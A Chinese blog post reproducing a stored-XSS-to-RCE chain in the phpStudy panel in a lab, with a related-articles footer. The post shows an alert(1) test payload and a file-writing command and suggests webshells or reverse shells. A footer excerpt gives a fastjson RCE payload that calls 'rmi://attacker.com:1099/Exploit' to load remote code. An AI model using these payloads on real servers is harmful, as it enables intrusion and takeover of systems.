小皮面板RCE复现

最新推荐文章于 2024-09-30 21:11:10 发布
最新推荐文章于 2024-09-30 21:11:10 发布
阅读量237 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32660043/article/details/128914428
版权

免责声明:文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!

漏洞成因

小皮面板登录失败时会将失败的用户名记录,并输出到面板首页,而这一过程没有对用户输入的字符做过滤,导致存在任意XSS,攻击者可以利用小皮面板自带的计划任务功能配合XSS实现RCE。

环境搭建

小皮官网下载面板,在本地安装。注意是面板,不是phpstudy。安装完成后会自动弹出管理端地址和账号密码的文本。
请添加图片描述

漏洞测试

先测试一下xss漏洞,用户名输入<script>alert(1)</script>,密码任意,验证码输入正确,点击登录。
请添加图片描述

然后登录管理员账号,页面弹窗,证明漏洞存在。
请添加图片描述

RCE复现

脚本参考的是ZAC大佬编写的,感谢大佬。

利用XSS调用我们事先准备好的命令执行脚本。这里执行的命令是echo hkqy > web目录/1.txt
请添加图片描述

登录管理员账号,成功写入文件。
请添加图片描述

实际应用可以写webshell,反弹,或者上马等,根据自己喜好。

公众号回复 phpstudy 获取脚本

cHr1s_h
关注
专栏目录
【漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5667
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE
网安复现系列:phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
weixin_54626591的博客
05-06 261
phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
小皮面板rce漏洞
weixin_61785633的博客
03-31 467
Linux也有不少规则,我们如果就按这种写法就会出现报错,不过我们却可以用双引号闭合,它只会把双引号所包含的数据写进文件中。这种方式,不过这也没关系,因为我们知道其实$_POST[]里面也有不用引号闭合的方式,那就是输入数字,变成$_POST[123],ok这下就修改完成了,后面在改改文件所在位置就行了,别文件传进去了,却访问不到木马文件。这就是我们当时登录时,所留下的记录,本来可以通过这个日志,知道有谁尝试登录过我们的小皮面板,但我们输入的js代码,会被它解析并运行,这就导致了xss漏洞。
PhpStudy下载安装使用学习
weixin_51621120的博客
09-09 1247
在PhpStudy安装路径之下,找到MySQL的包,找到bin文件夹,在bin中打开命令行界面。在物理路径之下,有WWW文件夹,将网站文件拖拽到该目录下,输入路径,就可以访问该网站文件。下载完成是一个压缩包的形式,解压得到一个.exe的执行文件,点击执行安装程序。启动Apache之后,再小皮工具的网站页面,可以查看网站信息并进行管理。双击打开PhpStudy程序,出现小皮工具自带的工具,红色表示未启动。红色表示未启动,蓝色表示已经启动,这里启动了一个Apache服务。密码等信息,在小皮工具板可以找到,
【漏洞复现】phpStudy 小皮 Windows面板 存在RCE漏洞
xt350488的博客
07-26 645
如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。这个时候我们再去访问这个php木马,这个时候就可以直接使用【蚁剑】连接,连接就不演示了(图不小心删了)此时你会发现你访问了这个php, 自动下载了这个文件,并没有执行,说明是纯静态的网页,我们也就使用。这个时候我们去网站后台看php版本,没有选择,选择指定的版本并保存就好。此时再输入正确的密码,成功弹窗。
phpstudy_小皮面板XSS到RCE
RestoreJustice的博客
03-23 686
​ phpStudy小皮面板用户登录日志存在存储型XSS漏洞,利用存储型XSS攻击者可以通过JS调用面板中的计划任务执行系统命令。
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1575
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
CloudPanel RCE漏洞复现(CVE-2023-35885)
0xSec
01-19 1049
由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。
【漏洞复现】Jupyter Notebook未授权访问到RCE
Fly_鹏程万里
06-20 348
Jupyter Notebook(此前被称为IPython notebook)是一个交互式笔记本,支持运行40多种编程语言,Jupyter Notebook的本质是一个Web应用程序,便于创建和共享程序文档,支持实时代码,数学方程,可视化和 markdown,如果管理员未为Jupyter Notebook配置密码将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
【网络安全】绕过 Etplorer 管理面板实现RCE
最新发布
等风来
09-30 1210
面板以树状结构显示了目录中的子目录和文件。由于我们能够访问站点的源代码,因此可以对各个端点进行进一步分析,挖掘潜在的漏洞。
浅谈RCE漏洞
qi_SJQ_的博客
01-23 798
命令执行漏洞(RCE) 漏洞形成原理: 程序代码输入或输出是控制不严格,导致用户可以构造包含恶意命令或代码的函数在服务器上执行。(发生在应用程序逻辑层上) 该漏洞可分为以下两种: 远程命令执行 ping 远程代码执行 evel 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdo
小皮面板(phpStudy for Linux 服务器运维管理面板
06-01
下载地址: 安装教程: 使用手册: 针对Linux系统,phpStudy团队推出全网首家linux docker容器面板,只要一个命令,快速安装面板,在面板里可以自行选择软件版本,可以方便的进行安全配置,就算没有Linux基础也可以快速搭建和管理服务器环境! 所有软件免费:phpStudy是一个知名老牌的服务器集成环境工具,我们一直秉承免费公益的理念,帮助广大站长方便、快速的搭建服务器环境。2019年我们新推出的面板继续免费,所有的软件安装全部免费。 可视化快速部署:“让天下没有难配的服务器环境!”这是我们的产品理念,本phpStudy Linux 面板支持可视化安装、搭建WEB服务器环境,包含各种功能配置,非常方便、快捷! 功能齐全:包含安装WEB环境所必须的“LAMP”或者“LNMP”软件,另外包括WEB的配置、安全的配置、监控报表、文件管理、操作日志等,功能还在不断的增加中! 高效运维:通过可视化的web面板可以轻松部署和管理上百个网站,另外可以时刻监控服务器和网站的运行情况,提升运维效率! 安全稳定、不断更新:网站三天两头的打不开或者被黑等是运维们最头疼的,所以为了确保服务器环境的安全稳定运行,phpStudy团队在不断的更新维护!
phpstudy小皮(PHP集成环境)下载及使用
m0_62481980的博客
12-10 2275
打开小皮(phpstudy),点击左侧管理-》创建网站,自己起一个域名,根目录必须是public,确认后重启小皮(关闭所有服务)再进入打开服务,点击管理-》打开网站,就进入到安装页面,安装完之后就可以进入到管理后台或前台页。这里咱们启动这两个,有时候mysql启动不了,是因为你的电脑已经有mysql在运行了,可以打开任务管理器服务里面将其关掉,然后这个MySQL5.7.26就可以启动了。直接官网下载即可,下载完解压是个.exe程序,直接点击安装就可以,它会自动在D盘目录为D:\phpstudy_pro。
小皮面板安装以及pikachu环境搭建
AlienEowynWan的博客
05-05 4926
学校实验课(终于开始学网安了),学一下WEB 小皮系统(phpstudy)安装 这是一个PHP集成环境,比较方便 下载地址:https://www.xp.cn/ 我下载的是WINDOWS版本的 下载之后直接双击安装就好了 安装好后打开如下图所示 pikachu靶场配置 pikachu下载地址:https://github.com/zhuifengshaonianhanlu/pikachu 下载好后,将pikachu.zip放到phpstudy安装目录下的WWW文件夹下进行解压 先在phpstudy里面
小皮php面板mysql配置_体验phpStudy小皮面板创建LAMP/LNMP系统和建站图文
weixin_30332165的博客
02-05 1877
在国庆节后老 左有看到原phpStudy面板新的Linux面板系统更新发布取名小皮面板(phpStudy Linux系统初次体验 - 一键安装phpStudy面板查看功能),初次体验这款面板之后我们肯定会会当前比较热门的宝塔面板作为比较,有些人说UI和功能上有所参考,但是本身在功能上你说有多可以创新也不可能,毕竟都是用的开源软件搭配组合的LAMP和LNMP。从老 左(LAOZUO.ORG)接触较多...
08-定时任务
我们的目标是星辰大海!
03-29 230
08-定时任务
在本地怎么使用phpstudy搭建WordPress网站
m0_46412408的博客
07-20 4035
在本地怎么使用phpstudy搭建WordPress网站。在本找到wp-config-sample的文件名字改为wp-config,以记事本打开后数据库名、用户名、密码三个参数并保存。在软件管理中找到phpMyAdmin4.8.5安装到localhost下,其他项目也可以使用。安装好小皮面板以后,点击网站,创建网站自定义域名和端口(演示创建网站的过程,下面使用的是重新创建的网站)在phpstudy_pro安装路径下www找到创建的网站文件。在小皮的数据库中添加用户的数据,以便网页与数据库建立连接。.....
小皮面板搭建网站
fghjbjhgb的博客
07-04 432
安装路径不能包含中文或空格。3.www文件夹里放入源码。
fastjson rce复现
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为而存在远程代码执行(RCE)漏洞。为了复现该漏洞,我们可以按照以下步骤进行操作: 第一步是选择一个适当的fastjson版本,建议使用较早的版本,因为新的版本通常会修复漏洞。将fastjson库添加到Java项目的依赖中。 第二步是创建一个恶意JSON字符串,该字符串中包含能够触发RCE漏洞的payload。例如,可以使用如下的JSON字符串: ``` { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://attacker.com:1099/Exploit", "autoCommit":true } ``` 在这个例子中,我们使用了`com.sun.rowset.JdbcRowSetImpl`类作为目标,其中连接地址指向攻击者控制的RMI服务器,用于向受害系统发送恶意代码。 第三步是编写Java代码,并将上一步创建的JSON字符串作为输入传递给fastjson的解析器。以下是一个简单的示例: ```java import com.alibaba.fastjson.JSON; public class FastjsonRce { public static void main(String[] args) { String maliciousJson = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.com:1099/Exploit\",\"autoCommit\":true}"; Object parsedObject = JSON.parse(maliciousJson); } } ``` 在这个示例中,我们使用`JSON.parse`方法将JSON字符串解析为一个对象。fastjson在解析时会实例化目标类,并调用其构造函数和setter方法,从而导致RCE漏洞的利用。 第四步是运行上述Java代码,并观察是否成功复现RCE漏洞。如果目标系统受到fastjson的漏洞影响,恶意代码会在解析过程中被执行,从而使攻击者可以远程控制该系统。 需要注意的是,复现fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值